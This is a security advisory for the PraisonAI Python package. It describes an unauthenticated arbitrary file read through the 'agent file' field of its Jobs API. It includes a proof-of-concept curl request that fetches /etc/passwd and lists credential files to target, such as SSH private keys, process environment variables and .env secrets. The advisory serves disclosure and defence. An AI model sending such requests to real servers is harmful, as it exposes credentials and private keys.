PT-2026-53143 · Pypi · Praisonai
Publicado
2026-06-18
·
Atualizado
2026-06-18
CVSS v3.1
7.5
Alta
| Vetor | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
Summary
An unauthenticated attacker can read arbitrary files on the server by supplying an absolute filesystem path in the
agent file field of the Jobs API. The field has no path validation, no allowlist, and no authentication is required to submit jobs.Details
The
agent file field in JobSubmitRequest accepts any filesystem path with no validation:python
# src/praisonai/praisonai/jobs/models.py:29
agent file: Optional[str] = Field(None, description="Path to agents.yaml file")
# NO path validator, NO allowlistThe executor reads the file directly:
python
# src/praisonai/praisonai/jobs/executor.py:221
agent file = job.agent file or "agents.yaml"
# passed directly to yaml.safe load(open(agent file))Proof of Concept
bash
curl -X POST http://:8005/api/v1/runs
-H "Content-Type: application/json"
-d '{"prompt": "run", "agent file": "/etc/passwd"}'Server responds with contents of
/etc/passwd.Other exploitable paths:
/proc/1/environ— environment variables, API keys/home//.ssh/id rsa— SSH private keys/app/.env— application secrets
Impact
Any unauthenticated attacker with network access to port 8005 can read any file accessible to the server process, including credentials, private keys, and environment variables.
Correção
Path traversal
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Enumeração de Fraquezas
Identificadores relacionados
Produtos afetados
Praisonai